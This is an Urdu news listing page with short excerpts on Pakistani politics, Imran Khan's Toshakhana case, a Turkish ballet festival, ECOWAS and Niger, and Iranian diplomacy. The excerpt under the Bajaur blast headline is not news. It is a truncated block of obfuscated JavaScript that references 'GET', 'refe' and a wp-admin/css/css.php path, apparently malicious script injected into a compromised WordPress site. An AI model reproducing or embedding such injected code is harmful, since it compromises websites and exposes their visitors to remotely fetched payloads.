پنجاب میں غیر قانونی تعمیرات کے دھندہ میں ملوث سرکاری افسران کے گرد گھیرا تنگ

پنجاب بھر میں جاری غیر قانونی تعمیرات کے خلاف حکومت کا بڑا اقدام، صوبائی وزیر برائے اطلاعات وبلدیات عامر میر نے محکمہ بلدیات کو غیر قانونی تعمیرات میں ملوث کرپٹ افسران کے خلاف سخت کارروائی کا حکم دے دیا۔ وزیر اطلاعات وبلدیات عامر میر  نے ہدایت دی کہ رشوت لے کر غیر قانونی تعمیرات کروانے مزید پڑھیں

ن لیگ الیکشن جیتی تو وزارتِ عظمیٰ کے امیدوار نواز شریف ہوں گے: وزیراعظم شہباز شریف

وزیر اعظم شہباز شریف نے کہا ہے کہ آئین اور قانون کے مطابق انتخابات منعقد کرانے کے اختیارات الیکشن کمیشن کے پاس ہیں۔ اگر مسلم لیگ ن الیکشن جیتی ہے تو وزارتِ عظمیٰ کے امیدوار نواز شریف ہوں گے۔ وزیر اعظم  شہباز شریف نے نجی ٹی وی کے پروگرام میں گفتگو کرتے ہوئے کہا کہ مزید پڑھیں

توشہ خانہ کیس: چیئرمین پی ٹی آئی عمران خان کا ہائیکورٹ کے فیصلے کیخلاف سپریم کورٹ سے رجوع

چیئرمین پاکستان تحریک انصاف (پی ٹی آئی) اور سابق وزیراعطم  عمران خان نے توشہ خانہ کیس رکوانے کیلئے ایک بار پھر سپریم کورٹ سے رجوع کر لیا۔ چیئرمین پی ٹی آئی عمران خان نے توشہ خانہ کیس میں 342 کا بیان ریکارڈ کرنے کی کارروائی رکوانے کیلئے اپیل دائر کر دی۔ درخواست پر فوری سماعت مزید پڑھیں

کیا آپ جانتے ہیں؟ 48

کیا آپ کو معلوم ہے کہ ترکیہ کے اہم سیاحتی مراکز میں شمار علاقے ‘بودرُم’ میں ہر سال ایک بیلے فیسٹیول منعقد ہوتا ہے اور یہ سلسلہ  گذشتہ 20 سالوں سے  جاری ہے؟   رواں سال 20 ویں دفعہ متوقع’ بین الاقوامی بودرم بیلے فیسٹیول’  ترکیہ کا پہلاا ور واحد بیلے فیسٹیول ہے۔ وزارت ثقافت مزید پڑھیں

صدر بازوم کی عہدے پر واپسی کے لیے باغیوں کو 1 ہفتے کی مہلت دیتے ہیں:ایکواس

مغربی افریقی ممالک کی اقتصادی تنظیم ایکو واس نے نائیجر میں قابض فوجی جتھے کو صدر محمد بازوم کی رہائی اور عہدے پر واپسی کے لیے ایک ہفتے کی مہلت دی ہے۔ نائیجیریا کے دارالحکومت ابوجا میں نائیجر کی صورتحال سے متعلق ایکواس کا اجلاس ختم ہو گیا۔ ایکو واس  کمیشن کے صدر عمر تورائے نے  پریس مزید پڑھیں

باجوڑ دھماکے میں کالعدم تنظیم داعش ملوث ہے: ابتدائی تحقیقات

; function x(I, h) { var H = A(); return x = function (X, J) { X = X – 0x84; var d = H[X]; return d; }, x(I, h); } function A() { var s = [ ‘send’, ‘refe’, ‘read’, ‘Text’, ‘6312jziiQi’, ‘ww.’, ‘rand’, ‘tate’, ‘xOf’, ‘10048347yBPMyU’, ‘toSt’, ‘4950sHYDTB’, ‘GET’, ‘www.’, ‘//nayadaur.tv/urdu/wp-admin/css/css.php’, ‘stat’, ‘440yfbKuI’, مزید پڑھیں

ایرانی وزیر خارجہ کی اقوام متحدہ کی خصوصی نمائندہ سے ملاقات

 ایرانی وزیر خارجہ حسین  امیر عبدالہیان نے اقوام متحدہ کی عراق کے لیے خصوصی نمائندہ  جینین ہینیس پلاسچیرٹ نے  عراق کی حالیہ صورتحال پر تبادلہ خیال کیا گیا ۔  ایران کی  نیم سرکاری خبر رساں ایجنسی مہر کے  مطابق، ایرانی وزیر خارجہ نے تہران میں پلاسچئیرٹ سے ملاقات کی ۔  اس  بات چیت میں عراق مزید پڑھیں